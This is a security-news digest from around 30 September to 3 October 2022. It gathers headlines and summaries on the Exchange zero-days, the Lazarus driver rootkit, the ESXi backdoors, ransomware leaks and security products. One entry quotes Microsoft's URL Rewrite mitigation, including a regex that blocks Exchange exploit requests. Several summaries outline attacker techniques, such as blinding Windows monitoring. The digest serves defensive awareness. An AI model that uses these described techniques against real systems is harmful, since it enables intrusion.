                Autosummary: "The attackers then used their kernel memory write access to disable seven mechanisms the Windows operating system offers to monitor its actions, like registry, file system, process creation, event tracing, etc., basically blinding security solutions in a very generic and robust way," Kálnai said. "


                Ex-NSA Employee Arrested for Trying to Sell U.S. Secrets to a Foreign Government

                government
                2022-10-03 https://thehackernews.com/2022/10/ex-nsa-employee-arrested-for-trying-to.html
                A former U.S. National Security Agency (NSA) employee has been arrested on charges of attempting to sell classified information to a foreign spy, who was actually an undercover agent working for the Federal Bureau of Investigation (FBI). Jareh Sebastian Dalke, 30, was employed at the NSA for less than a month from June 6, 2022, to July 1, 2022, serving as an Information Systems Security Designer "

                Autosummary: "On or about August 26, 2022, Dalke requested $85,000 in return for additional information in his possession," the DoJ said, stating, "Dalke agreed to transmit additional information using a secure connection set up by the FBI at a public location in Denver," eventually leading to his capture. "


                Week in review: MS Exchange zero-days exploited, AD attack paths, developing secure APIs

                exploits
                2022-10-02 https://www.helpnetsecurity.com/2022/10/02/week-in-review-ms-exchange-zero-days-exploited-ad-attack-paths-developing-secure-apis/

                SpyCast: Cross-platform mDNS enumeration tool. SpyCast is a cross-platform mDNS enumeration tool that can work either in active mode by recursively querying services or in passive mode by only listening to multicast packets. Attackers use novel technique, malware to compromise hypervisors and virtual machines. Unknown attackers wielding novel specialized malware have managed to compromise VMware ESXi hypervisors and guest Linux and Windows virtual machines, Mandiant threat analysts have discovered. To encrypt or to destroy? Ransomware … More

                The post Week in review: MS Exchange zero-days exploited, AD attack paths, developing secure APIs appeared first on Help Net Security.

                "

                Autosummary: The significance of parallel tasks execution for security teams. In this Help Net Security video, Leonid Belkind, CTO at Torq, discusses parallel execution, which enables security operations professionals to execute more tasks simultaneously to enrich, analyze, contain, and resolve security threats. New infosec products of the week: September 30, 2022. Here’s a look at the most interesting products from the past week, featuring releases from Illumio, Malwarebytes, Netography, TransUnion, and Truecaller. "


                German police identified a gang that stole €4 million via phishing attacks

                financial
                2022-10-02 https://securityaffairs.co/wordpress/136519/cyber-crime/phishing-attacks-gang-arrest.html

                German police arrested one individual suspected of having stolen €4 million from users via large-scale phishing campaigns. Germany’s Bundeskriminalamt (BKA) arrested an individual (24) suspected of having stolen €4,000,000 from internet users via phishing attacks, along with two suspected accomplices. The phishing campaigns were conducted between October 3, 2020, and May 29, […]

                The post German police identified a gang that stole €4 million via phishing attacks appeared first on Security Affairs.

                "

                Autosummary: "


                Russians dodging mobilization behind flourishing scam market

                financial
                2022-10-02 https://www.bleepingcomputer.com/news/security/russians-dodging-mobilization-behind-flourishing-scam-market/
                Ever since Russian president Vladimir Putin ordered partial mobilization after facing setbacks on the Ukrainian front, men in Russia and the state's conscript officers are playing a "cat and mouse" game involving technology and cybercrime services. [...] "

                Autosummary: Kommersant's source stated that these SIM cards work in the networks of MTS, MegaFon, Beeline, Tele2, and Yota, and concern "pay-as-you-use" programs. "


                BlackCat ransomware gang claims to have hacked US defense contractor NJVC

                exploits ransomware
                2022-10-02 https://securityaffairs.co/wordpress/136537/cyber-crime/njvc-data-breach.html

                Another US defense contractor has suffered a data breach: the BlackCat ransomware gang claims to have hacked NJVC. The ALPHV/BlackCat ransomware gang claims to have breached the IT firm NJVC, which supports the federal government and the United States Department of Defense. The company supports intelligence, defense, and geospatial organizations. The company has more than 1,200 employees in locations worldwide. BlackCat added NJVC to […]

                The post BlackCat ransomware gang claims to have hacked US defense contractor NJVC appeared first on Security Affairs.

                "

                Autosummary: 🌐 BlackCat (ALPHV) #Ransomware team added NJVC to the victims' list 🚨 NJVC is an information technology (IT) company supporting the federal government and the United States Department of Defense, with $290 Million in revenue from The United States 🇺🇸#Blackcat pic.twitter.com/RnsJPUUMLw — DarkFeed (@ido_cohen2) September 29, 2022 BlackCat added NJVC to the list of victims on its Tor leak site and is threatening to release the allegedly stolen data if the company does not pay the ransom. "


                Ransomware gang leaks data stolen from LAUSD school system

                exploits
                2022-10-02 https://www.bleepingcomputer.com/news/security/ransomware-gang-leaks-data-stolen-from-lausd-school-system/
                The Vice Society Ransomware gang published data and documents Sunday morning that were stolen from the Los Angeles Unified School District during a cyberattack earlier this month. [...]

                Autosummary: While BleepingComputer has not examined any of the data leaked today, some of the folders indicate they may contain sensitive information, such as "ssn", "Secret and Confidential", "Passport", and "Incident."


                LMG Security expands its cybersecurity solutions and services

                ciber
                2022-10-01 https://www.helpnetsecurity.com/2022/10/01/lmg-security-cybersecurity-solutions/

                LMG Security has expanded its selection of cybersecurity advisory, testing, and training services with a new line of cybersecurity solutions. These solutions are designed to reduce the burden organizations face from implementing or managing cybersecurity technology, as well as create fast, easy access to skilled cybersecurity staff to augment internal teams. LMG Security offers the following new solutions and services: Virtual CISO and staff augmentation: Organizations struggle to find and retain cybersecurity talent. LMG Security … More

                The post LMG Security expands its cybersecurity solutions and services appeared first on Help Net Security.

                Autosummary: Endpoint detection and response implementation: LMG Security implements and seamlessly integrates an endpoint detection and response solution that helps organizations defend against zero-day attacks, supply chain vulnerabilities, and other common cybersecurity threats.


                State-Sponsored Hackers Likely Exploited MS Exchange 0-Days Against ~10 Organizations

                exploits government
                2022-10-01 https://thehackernews.com/2022/10/state-sponsored-hackers-likely.html
                Microsoft on Friday disclosed that a single activity group in August 2022 achieved initial access and breached Exchange servers by chaining the two newly disclosed zero-day flaws in a limited set of attacks aimed at fewer than 10 organizations globally. "These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory

                Autosummary: It has also published a script for the following URL Rewrite mitigation steps that it said is "successful in breaking current attack chains":
                1. Open IIS Manager.
                2. Select Default Web Site.
                3. In the Feature View, click URL Rewrite.
                4. In the Actions pane on the right-hand side, click Add Rule(s)…
                5. Select Request Blocking and click OK.
                6. Add the string ".*autodiscover\.json.*\@.*Powershell.*" (excluding quotes).
                7. Select Regular Expression under Using.
                8. Select Abort Request under How to block and then click OK.
                9. Expand the rule and select the rule with the pattern .*autodiscover\.json.*\@.*Powershell.* and click Edit under Conditions.


                CISA Warns of Hackers Exploiting Critical Atlassian Bitbucket Server Vulnerability

                exploits
                2022-10-01 https://thehackernews.com/2022/10/cisa-warns-of-hackers-exploiting.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a recently disclosed critical flaw impacting Atlassian's Bitbucket Server and Data Center to the Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. Tracked as CVE-2022-36804, the issue relates to a command injection vulnerability that could allow malicious actors to gain arbitrary


                CISA adds Atlassian Bitbucket Server flaw to its Known Exploited Vulnerabilities Catalog

                exploits
                2022-10-01 https://securityaffairs.co/wordpress/136514/security/atlassian-bitbucket-flaw-known-exploited-vulnerabilities-catalog.html

                CISA added a recently disclosed flaw in Atlassian Bitbucket Server, tracked as CVE-2022-36804, to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week added a recently disclosed critical vulnerability in Atlassian’s Bitbucket Server and Data Center to its  Known Exploited Vulnerabilities Catalog. According to Binding Operational Directive (BOD) 22-01: Reducing the Significant […]

                The post CISA adds Atlassian Bitbucket Server flaw to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.


                Guacamaya hacktivists stole sensitive data from Mexico and Latin American countries

                latam
                2022-10-01 https://securityaffairs.co/wordpress/136497/data-breach/guacamaya-hacked-latam-countries.html

                A hacker group called Guacamaya stole classified government information from multiple military and government agencies across several Latin American countries. Among the data stolen by a group of hackers called Guacamaya (macaw in Spanish) there was a huge trove of emails from Mexico’s Defense Department, which shed light on the poor resilience of the […]

                The post Guacamaya hacktivists stole sensitive data from Mexico and Latin American countries appeared first on Security Affairs.


                Microsoft to let Office 365 users report Teams phishing messages

                financial
                2022-10-01 https://www.bleepingcomputer.com/news/microsoft/microsoft-to-let-office-365-users-report-teams-phishing-messages/
                Microsoft is working on updating Microsoft Defender for Office 365 to allow Microsoft Teams users to alert their organization's security team of any dodgy messages they receive. [...]


                Lazarus hackers abuse Dell driver bug using new FudModule rootkit

                exploits
                2022-10-01 https://www.bleepingcomputer.com/news/security/lazarus-hackers-abuse-dell-driver-bug-using-new-fudmodule-rootkit/
                The notorious North Korean hacking group "Lazarus" was seen installing a Windows rootkit that abuses a Dell hardware driver in a Bring Your Own Vulnerable Driver attack. [...]

                Autosummary: "The attackers then used their kernel memory write access to disable seven mechanisms the Windows operating system offers to monitor its actions, like registry, file system, process creation, event tracing etc., basically blinding security solutions in a very generic and robust way," continued ESET's report.


                Trust Stamp Privtech helps government agencies protect against fraud

                government
                2022-09-30 https://www.helpnetsecurity.com/2022/09/30/trust-stamp-privtech/

                Trust Stamp has unveiled its new government-focused, privacy-first identity technology, Privtech, and reports it has received registered trademark status for the Privtech solution by the US Patent and Trademark Office. The technology provides four customizable levels of privacy protection using the Company’s existing Privtech Certified structure and offers government agencies the ability to verify identity and protect against fraud, while minimizing the data collected and providing transparency as to its use. Gareth Genner, Chief Executive … More

                The post Trust Stamp Privtech helps government agencies protect against fraud appeared first on Help Net Security.


                Truecaller Assistant filters out fraud and scam calls

                financial
                2022-09-30 https://www.helpnetsecurity.com/2022/09/30/truecaller-assistant/

                The age of caller ID hasn’t entirely lived up to its promise, because it’s still not clear whether a call is truly important. Some 86% of Americans report they only answer calls if they can identify the person or business calling. Now they don’t have to make the distinction on their own. Truecaller has launched Truecaller Assistant, an innovation that leverages machine learning, speech-to-text, and natural language processing technologies to create a call-screening solution. Truecaller Assistant, … More

                The post Truecaller Assistant filters out fraud and scam calls appeared first on Help Net Security.

                Autosummary: Truecaller Assistant, available on both Android and iOS, is a customizable, interactive, digital receptionist that empowers users to answer important calls and avoid unwanted ones.


                Niagara Networks increase capacity of its threat detection security stack

                government
                2022-09-30 https://www.helpnetsecurity.com/2022/09/30/niagara-networks-3808e-multifunctional-hybrid-packet-broker/

                Niagara Networks has unveiled that Niagara Networks’ 3808E multifunctional Hybrid Packet Broker solution introduces a full lineup of the 40G and 100G BiDi bypass capabilities to enable ultra capacity over an existing infrastructure and flexibility across data center deployments. The 3808E multifunctional Hybrid Packet Broker increases operational efficiency and enables always-on high-availability of complex inline cybersecurity tools. With the new capabilities of Niagara Networks’ solution, data center operators will not need to add optical fiber … More

                The post Niagara Networks increase capacity of its threat detection security stack appeared first on Help Net Security.


                Impinj Authenticity provides product authentication to prevent counterfeits

                government
                2022-09-30 https://www.helpnetsecurity.com/2022/09/30/impinj-authenticity/

                Impinj announced the Impinj Authenticity solution engine to provide real-time, high-volume product authentication for brands and their customers. The new Impinj Authenticity solution engine cryptographically authenticates everyday items – such as retail merchandise, automotive parts, and medications – to help prevent counterfeits, ensure product safety, and secure the supply chain. “The Impinj Authenticity solution engine leverages the whole Impinj platform, including Impinj endpoint ICs, reader ICs, readers, cloud services, and partner ecosystem, to cryptographically protect every item … More

                The post Impinj Authenticity provides product authentication to prevent counterfeits appeared first on Help Net Security.

                Autosummary: “The Impinj Authenticity solution engine leverages the whole Impinj platform, including Impinj endpoint ICs, reader ICs, readers, cloud services, and partner ecosystem, to cryptographically protect every item that enterprises manufacture, transport, and sell.”
                Proven expertise and RAIN RFID leadership: Purpose-built for product authentication, the Impinj Authenticity solution engine leverages the Impinj platform, comprising RAIN RFID tag chips, reader chips, readers, cloud services, and a global partner ecosystem.


                Zyxel EX5512-T0 AX6000 WiFi 6 Ethernet gateway enhances network capacity for service providers

                government
                2022-09-30 https://www.helpnetsecurity.com/2022/09/30/zyxel-communications-ex5512-t0-ax6000-wifi-6/

                Zyxel Communications has launched the EX5512-T0 AX6000 WiFi 6 Multi-Gigabit Ethernet gateway. The new dual-band wireless 11AX gateway, which enables service providers to deliver 2.5 Gigabit Ethernet internet access to subscribers’ ultra-connected homes, is the first of a complete portfolio of Zyxel multi-gigabit WiFi 6 and WiFi 6E solutions, including 1G, 2.5G, and 10G gateways, that will be announced this year. Equipped with 2.5G Ethernet WAN and LAN ports to eliminate network bottlenecks, EX5512-T0 leverages WiFi 6 … More

                The post Zyxel EX5512-T0 AX6000 WiFi 6 Ethernet gateway enhances network capacity for service providers appeared first on Help Net Security.

                Autosummary: Features and benefits of the EX5512-T0 AX6000 WiFi 6 Multi-Gigabit Ethernet gateway include: Next-generation technology to support bandwidth-intensive applications – EX5512-T0 supports the 802.11ax (WiFi 6) standard to deliver throughput speeds up to 6000 Mbps, enabling operators to provide UHD 4K/8K services, and maximize the performance of next-generation, high-bandwidth, latency-sensitive applications.


                The current state of cloud security

                government
                2022-09-30 https://www.helpnetsecurity.com/2022/09/30/state-of-cloud-security-video/

                Cloud security became much more complicated as COVID-19 hit and remote/hybrid workforces emerged. Organizations are struggling to sufficiently secure new cloud environments implemented during the pandemic while maintaining legacy equipment and trying to adapt their overall security strategy to the evolving landscape. In this Help Net Security video, Ryan Sydlik, Security Engineer at Telos, explores where cloud security stands today, what challenges remain from the pandemic, and how organizations can address them.

                The post The current state of cloud security appeared first on Help Net Security.


                Top issues driving cybersecurity: Growing number of cybercriminals, variety of attacks

                ciber
                2022-09-30 https://www.helpnetsecurity.com/2022/09/30/top-issues-driving-cybersecurity/

                Fortifying cybersecurity defenses remains a work in progress for many organizations, who acknowledge their shortcomings but have yet to commit the necessary resources to the effort, according to new research from CompTIA. While a majority of respondents in each of seven geographic regions feels that their company’s cybersecurity is satisfactory, CompTIA’s “State of Cybersecurity” shows that a much smaller number rank the situation as “completely satisfactory.” Nearly everyone feels that there is room for improvement. … More

                The post Top issues driving cybersecurity: Growing number of cybercriminals, variety of attacks appeared first on Help Net Security.

                Autosummary: Among other changes in organizations’ approach to cybersecurity:
                43% of companies have placed a higher priority on incident response
                39% are deploying a more diverse set of technology tools, with SaaS monitoring and management tools making a substantial jump in adoption
                38% are increasing their focus on process improvements
                37% are shifting to more proactive measures
                36% are expanding employee education.


                Are you inundated by a never-ending stream of cyberattacks?

                ciber
                2022-09-30 https://www.helpnetsecurity.com/2022/09/30/inundated-never-ending-stream-cyberattacks/

                Trellix released global research revealing the cost of siloed security, weak spots in protection, and lack of confidence amongst security operations teams. The study of 9,000 global cybersecurity professionals also looks to the future of security and the technology poised to revolutionize security operations. 89% of respondents describe their current security model as “siloed.” Consequently, 73% are likely allocating budget to advanced solutions, including XDR, to enable an integrated security approach. “This research reveals how … More

                The post Are you inundated by a never-ending stream of cyberattacks? appeared first on Help Net Security.

                Autosummary: Additional technologies very likely to be implemented are Network Detection and Response (NDR) (39%), Endpoint Detection and Response (EDR) (38%) and breach attack simulations (37%).


                WARNING: New Unpatched Microsoft Exchange Zero-Day Under Active Exploitation

                exploits
                2022-09-30 https://thehackernews.com/2022/09/warning-new-unpatched-microsoft.html
                Security researchers are warning of previously undisclosed flaws in fully patched Microsoft Exchange servers being exploited by malicious actors in real-world attacks to achieve remote code execution on affected systems. That's according to Vietnamese cybersecurity company GTSC, which discovered the shortcomings as part of its security monitoring and incident response efforts in August 2022. The

                Autosummary: *" to the URL Path, and Condition input: Choose {REQUEST_URI} "I can confirm significant numbers of Exchange servers have been backdoored - including a honeypot," Security researcher Kevin Beaumont said in a series of tweets, adding, "it looks like a variant of proxying to the admin interface again.


                Experts uncovered novel Malware persistence within VMware ESXi Hypervisors

                exploits
                2022-09-30 https://securityaffairs.co/wordpress/136408/hacking/vmware-esxi-hypervisors-malware.html

                Researchers from Mandiant have discovered a novel malware persistence technique within VMware ESXi Hypervisors. Mandiant detailed a novel technique used by malware authors to achieve administrative access within VMware ESXi Hypervisors and take over vCenter servers and virtual machines for Windows and Linux to perform the following actions: Send commands to the hypervisor that will […]

                The post Experts uncovered novel Malware persistence within VMware ESXi Hypervisors appeared first on Security Affairs.

                Autosummary: A signature file – a digital signature used to verify the host acceptance level of a VIB. The XML descriptor file is a config which contains references to the following: the payload to be installed; VIB metadata, such as the name and install date; the signature file that belongs to the VIB. Mandiant researchers discovered that attackers were able to modify the acceptance level in the XML descriptor of the VIB from ‘community’ to ‘partner’ to make it appear to have been created by a trusted entity.


                Microsoft confirms new Exchange zero-days are used in attacks

                exploits
                2022-09-30 https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-new-exchange-zero-days-are-used-in-attacks/
                Microsoft has confirmed that two recently reported zero-day vulnerabilities in Microsoft Exchange Server 2013, 2016, and 2019 are being exploited in the wild. [...]

                Autosummary: "The first vulnerability, identified as CVE-2022-41040, is a Server-Side Request Forgery (SSRF) vulnerability, while the second, identified as CVE-2022-41082, allows remote code execution (RCE) when PowerShell is accessible to the attacker," Microsoft said.


                Two Microsoft Exchange zero-days exploited by attackers (CVE-2022-41040, CVE-2022-41082)

                exploits
                2022-09-30 https://www.helpnetsecurity.com/2022/09/30/cve-2022-41040-cve-2022-41082/

                Attackers are leveraging two zero-day vulnerabilities (CVE-2022-41040, CVE-2022-41082) to breach Microsoft Exchange servers. News of the attacks broke on Wednesday, when researchers with Vietnamese cybersecurity company GTSC released a warning saying that, “while providing SOC service to a customer, GTSC Blueteam detected exploit requests in IIS logs with the same format as ProxyShell vulnerability.” About the vulnerabilities (CVE-2022-41040, CVE-2022-41082) CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability and CVE-2022-41082 allows remote code execution when PowerShell … More

                The post Two Microsoft Exchange zero-days exploited by attackers (CVE-2022-41040, CVE-2022-41082) appeared first on Help Net Security.

                Autosummary: About the vulnerabilities (CVE-2022-41040, CVE-2022-41082): CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability and CVE-2022-41082 allows remote code execution when PowerShell is accessible to the attacker, Microsoft explained.


                Microsoft Confirms 2 New Exchange Zero-Day Flaws Being Used in the Wild

                exploits
                2022-09-30 https://thehackernews.com/2022/09/microsoft-confirms-2-new-exchange-zero.html
                Microsoft officially disclosed it is investigating two zero-day security vulnerabilities impacting Exchange Server 2013, 2016, and 2019 following reports of in-the-wild exploitation. "The first vulnerability, identified as CVE-2022-41040, is a Server-Side Request Forgery (SSRF) vulnerability, while the second, identified as CVE-2022-41082, allows remote code execution (RCE) when PowerShell is


                Microsoft confirms Exchange zero-day flaws actively exploited in the wild

                exploits
                2022-09-30 https://securityaffairs.co/wordpress/136447/hacking/microsoft-exchange-zero-day-3.html

                Microsoft confirmed that two recently disclosed zero-day flaws in Microsoft Exchange are being actively exploited in the wild. Microsoft confirmed that two zero-day vulnerabilities in Microsoft Exchange recently disclosed by researchers at cybersecurity firm GTSC are being actively exploited in the wild. The IT giant has promptly started the investigation into the two zero-day vulnerabilities […]

                The post Microsoft confirms Exchange zero-day flaws actively exploited in the wild appeared first on Security Affairs.

                Autosummary: To allow organizations to check if their Exchange Servers have been compromised by exploiting these flaws, GTSC released guidelines and a tool to scan IIS log files (stored by default in the %SystemDrive%\inetpub\logs\LogFiles folder). Method 1: use the PowerShell command: Get-ChildItem -Recurse


                Unpatched Microsoft Exchange Zero-Day actively exploited in the wild

                exploits
                2022-09-30 https://securityaffairs.co/wordpress/136433/hacking/microsoft-exchange-zero-day-2.html

                Security researchers are warning of new Microsoft Exchange zero-days that are being exploited by malicious actors in the wild. Cybersecurity firm GTSC discovered two Microsoft Exchange zero-day vulnerabilities that are under active exploitation in attacks in the wild. Both flaws were discovered by the researchers as part of an incident response activity in August […]

                The post Unpatched Microsoft Exchange Zero-Day actively exploited in the wild appeared first on Security Affairs.


                Germany arrests hacker for stealing €4 million via phishing attacks

                financial
                2022-09-30 https://www.bleepingcomputer.com/news/security/germany-arrests-hacker-for-stealing-4-million-via-phishing-attacks/
                Germany's Bundeskriminalamt (BKA), the country's federal criminal police, carried out raids on the homes of three individuals yesterday suspected of orchestrating large-scale phishing campaigns that defrauded internet users of €4,000,000. [...]

                Autosummary: One of the three individuals, a 24-year-old German citizen, has been arrested and charged, while a second one, a 40-year-old, was also charged with 124 acts of computer fraud.


                Attackers use novel technique, malware to compromise hypervisors and virtual machines

                exploits
                2022-09-30 https://www.helpnetsecurity.com/2022/09/30/compromise-hypervisors-virtual-machines/

                Unknown attackers wielding novel specialized malware have managed to compromise VMware ESXi hypervisors and guest Linux and Windows virtual machines, Mandiant threat analysts have discovered. They named the malware VirtualPITA (ESXi & Linux), VirtualPIE (ESXi), and VirtualGATE (Windows), and shared detection and hardening advice. The malware and techniques used by the attackers VirtualPITA and VirtualPIE are backdoors, which the attackers deliver by using malicious vSphere Installation Bundles (VIBs). VirtualGATE is a utility program that incorporates … More

                The post Attackers use novel technique, malware to compromise hypervisors and virtual machines appeared first on Help Net Security.

                Autosummary: VMware recommendations: “Mandiant has brought to our attention a new variant of malware targeting vSphere, which was discovered in an environment where threat actors may have used operational security weaknesses to compromise a mutual customer,” VMware shared on Thursday, in response to Mandiant’s report.


                Cyber Attacks Against Middle East Governments Hide Malware in Windows logo

                exploits government
                2022-09-30 https://thehackernews.com/2022/09/cyber-attacks-against-middle-east.html
                An espionage-focused threat actor has been observed using a steganographic trick to conceal a previously undocumented backdoor in a Windows logo in its attacks against Middle Eastern governments. Broadcom's Symantec Threat Hunter Team attributed the updated tooling to a hacking group it tracks under the name Witchetty, which is also known as LookingFrog, a subgroup operating under the TA410


                New Malware Campaign Targeting Job Seekers with Cobalt Strike Beacons

                exploits
                2022-09-30 https://thehackernews.com/2022/09/new-malware-campaign-targeting-job.html
                A social engineering campaign leveraging job-themed lures is weaponizing a years-old remote code execution flaw in Microsoft Office to deploy Cobalt Strike beacons on compromised hosts. "The payload discovered is a leaked version of a Cobalt Strike beacon," Cisco Talos researchers Chetan Raghuprasad and Vanja Svajcer said in a new analysis published Wednesday. "The beacon configuration contains


                CISA: Hackers exploit critical Bitbucket Server flaw in attacks

                exploits
                2022-09-30 https://www.bleepingcomputer.com/news/security/cisa-hackers-exploit-critical-bitbucket-server-flaw-in-attacks/
                The Cybersecurity and Infrastructure Security Agency (CISA) has added three more security flaws to its list of bugs exploited in attacks, including a Bitbucket Server RCE and two Microsoft Exchange zero-days. [...]

                Autosummary: We at @SolveCyberRisk @binaryedgeio have been observing active scanning and exploitation of the just announced CVE-2022-36804 - This CVE affects Atlassian Bitbucket, go patch: https://t.co/YYG1qY9uUg pic.twitter.com/Jy12W9ZB3E — Tiago Henriques (@Balgan) September 23, 2022
                Federal agencies ordered to mitigate: all Federal Civilian Executive Branch (FCEB) agencies must apply patches or mitigation measures for these three actively exploited bugs after their addition to CISA's KEV catalog, as required by a binding operational directive (BOD 22-01) from November.


                Fake US govt job offers push Cobalt Strike in phishing attacks

                financial
                2022-09-30 https://www.bleepingcomputer.com/news/security/fake-us-govt-job-offers-push-cobalt-strike-in-phishing-attacks/
                A new phishing campaign targets US and New Zealand job seekers with malicious documents installing Cobalt Strike beacons for remote access to victims' devices. [...]

                Autosummary: [Image caption: Bitbucket repository used by the threat actor (Cisco)]
                Deploying via PowerShell: The first attack method executes a series of Visual Basic scripts in the downloaded DOTM template, starting from decoding a data blob, writing it into an HTA file, and loading the next script using ShellExecute.


                Prison for ex-eBay staff who aggressively cyberstalked company’s critics with Craigslist sex party ads and funeral wreaths

                industry
                2022-09-30 https://www.bitdefender.com/blog/hotforsecurity/prison-for-ex-ebay-staff-who-aggressively-cyberstalked-companys-critics-with-craigslist-sex-party-ads-and-funeral-wreaths-2/
                Two men, who previously worked at eBay, have been sentenced to prison after admitting their role in a cyberstalking campaign that targeted the editor and publisher of a newsletter that criticised the company. Read more in my article on the Hot for Security blog.

                Autosummary: The harassment campaign launched by the group of eBay employees included:
                sending anonymous, threatening messages
                delivering a funeral wreath, a mask of a bloody pig's face, live insects, and a book on surviving the loss of a spouse
                sending pornography addressed to the Steiners, but delivered to their neighbours
                posting adverts for sex parties at the couple's home on Craigslist
                traveling across the country to spy on the Steiners, and attempting to plant a GPS tracker on their car
                Fearing for their lives, the Steiners installed surveillance cameras to monitor anyone approaching their home.


                New Malware Families Found Targeting VMware ESXi Hypervisors

                exploits
                2022-09-30 https://thehackernews.com/2022/09/new-malware-families-found-targeting.html
                Threat actors have been found deploying never-before-seen post-compromise implants in VMware's virtualization software to seize control of infected systems and evade detection. Google's Mandiant threat intelligence division referred to it as a "novel malware ecosystem" that impacts VMware ESXi, Linux vCenter servers, and Windows virtual machines, allowing attackers to maintain persistent access


                US DoD announced the results of the Hack US bug bounty challenge

                exploits
                2022-09-30 https://securityaffairs.co/wordpress/136462/hacking/dod-hack-us-results.html

                The US Department of Defense (DoD) shared the results of the Hack US bug bounty program that took place in July. On July 4, 2022, the US Department of Defense (DoD) and HackerOne started the Hack US, a one-week bug bounty challenge, which is considered part of DoD’s vulnerability disclosure program (VDP). The challenge was launched Chief […]

                The post US DoD announced the results of the Hack US bug bounty challenge appeared first on Security Affairs.


                The Week in Ransomware - September 30th 2022 - Emerging from the Shadows

                exploits ransomware
                2022-09-30 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-30th-2022-emerging-from-the-shadows/
                This week's news primarily revolves around LockBit, BlackMatter, and the rising enterprise-targeting Royal ransomware operation. [...]

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @Seifreed, @serghei, @VK_Intel, @billtoulas, @DanielGallagher, @jorntvdw, @PolarToffee, @BleepinComputer, @fwosar, @struppigel, @demonslay335, @LawrenceAbrams, @Ionut_Ilascu, @FourOctets, @malwrhunterteam, @malwareforme, @swascan, @y_advintel, @AdvIntel, @angel11VR, @InsideStairwell, @aejleslie, @Cyderes, @ahnlab, and @pcrisk.


                Two new Exchange Server zero-days in the wild

                exploits
                2022-09-30 https://www.malwarebytes.com/blog/news/2022/09/two-new-exchange-zero-days-that-look-and-feel-like-proxyshell-part-2

                Categories: Exploits and vulnerabilities, News

                Tags: Exchange, ProxyShell, remote PowerShell, web shell, CVE-2022-41040, CVE-2022-41082, SSRF, RCE

                Two ProxyShell-like vulnerabilities are being used to exploit Microsoft Exchange Servers

                The post Two new Exchange Server zero-days in the wild appeared first on Malwarebytes Labs.

                Autosummary: Microsoft has issued some customer guidance as it investigates (yes, more) reported vulnerabilities in Microsoft Exchange Server, affecting the 2013, 2016, and 2019 versions of the software. The vulnerabilities, which are chained together, are: CVE-2022-41040, a Server-Side Request Forgery (SSRF) vulnerability.


                Aunalytics Security Patching Platform protects users against system compromise

                industry
                2022-09-29 https://www.helpnetsecurity.com/2022/09/29/aunalytics-security-patching-platform/

                Aunalytics initiated its Security Patching Platform, Co-managed Patching as a Service to complement the company’s Advanced Security solution suite. Windows OS and supported 3rd party patch management allow for tighter security in the defense against cyberattacks and the new offering ensures active remediation. According to a 2022 Data Breach Investigations Report by Verizon, around 70 percent of successful cyberattacks exploited known vulnerabilities with available patches, making it important to update operating systems and applications regularly …

                The post Aunalytics Security Patching Platform protects users against system compromise appeared first on Help Net Security.

                Autosummary: The platform facilitates collaboration between IT and security teams and includes the following capabilities: inventory and performance management and proactive alerting; patch deployment control strategy, prioritization and planning; patch vetting and blacklisting intelligence; Windows operating system patch management; supported 3rd-party patch management; anti-malware; DNS-based malware protection; device encryption management; and an innovative management tool library. “Security patch exploits can have extremely damaging effects on an organization, decreasing revenues or causing reputational damage, making it imperative to have security patching in place,” said Chris Nicholson, Vice President of Managed IT Services.


                Malwarebytes enhances OneView platform to improve protection for SMB customers

                exploits
                2022-09-29 https://www.helpnetsecurity.com/2022/09/29/malwarebytes-oneview-platform-msp/

                Malwarebytes has expanded its OneView platform capabilities and grown the company’s Managed Service Provider (MSP) program. In addition to endpoint security, MSPs can now access vulnerability assessment, patch management and Domain Name System (DNS) filtering from Malwarebytes OneView. “At Malwarebytes, we aim to serve the underserved, which is what our MSP partners are doing every day for SMBs,” said Brian Thomas, Vice President of Worldwide MSP & Channel Programs at Malwarebytes. “I joined …

                The post Malwarebytes enhances OneView platform to improve protection for SMB customers appeared first on Help Net Security.

                Autosummary: Malwarebytes’ initial MSP Program and OneView showed significant traction, resulting in over 250% YOY growth, with more than 2,700 new global MSP partners and strategic partnerships with Addigy, Atera, ConnectWise, Datto, GCN Group, Kaseya, Sherweb, TeamViewer and regional partner Soft Solutions.


                Embedded IoT security threats and challenges

                industry
                2022-09-29 https://www.helpnetsecurity.com/2022/09/29/embedded-iot-security-threats-challenges-video/

                IoT embedded systems combine hardware, firmware, and internet connectivity to carry out particular functions. These devices transfer real-time data via the internet for various purposes, including tracking, monitoring, and analysis. In this Help Net Security video, Hubertus Grobbel, VP of Security Solutions at Swissbit, discusses the insecurity of IoT devices and offers tips on how to secure them.

                The post Embedded IoT security threats and challenges appeared first on Help Net Security.



                Office exploits continue to spread more than any other category of malware

                exploits ransomware
                2022-09-29 https://www.helpnetsecurity.com/2022/09/29/office-exploits-continue-to-spread/

                The latest Internet Security Report from the WatchGuard Threat Lab shows a reduction in overall malware detections from the peaks seen in the first half of 2021, along with an increase in threats for Chrome and Microsoft Office and the ongoing Emotet botnet resurgence. Office exploits on the rise: “While overall malware attacks in Q2 fell off from the all-time highs seen in previous quarters, over 81% of detections came via TLS encrypted connections, continuing …

                The post Office exploits continue to spread more than any other category of malware appeared first on Help Net Security.

                Autosummary: Office exploits on the rise: “While overall malware attacks in Q2 fell off from the all-time highs seen in previous quarters, over 81% of detections came via TLS encrypted connections, continuing a worrisome upward trend,” said Corey Nachreiner, CSO at WatchGuard.


                Data security trends: 7 statistics you need to know

                industry
                2022-09-29 https://www.helpnetsecurity.com/2022/09/29/data-security-trends/

                U.S. businesses are at high risk for data security threats from increasingly effective phishing attempts and the lack of procedures to restrict data access, according to GetApp’s 4th Annual Data Security Report. Newer companies are especially vulnerable to security threats. This survey of IT security managers and employees reveals seven significant trends related to data security threats facing U.S. businesses: 1. Phishing emails are on the rise, and so are the employees clicking the links …

                The post Data security trends: 7 statistics you need to know appeared first on Help Net Security.

                Autosummary: Phishing emails are on the rise, and so are the employees clicking the links. This year, 89% of companies surveyed report receiving a phishing email, a jump from 77% who said the same in 2021.


                Phishing activity exploded in Q2 2022

                financial
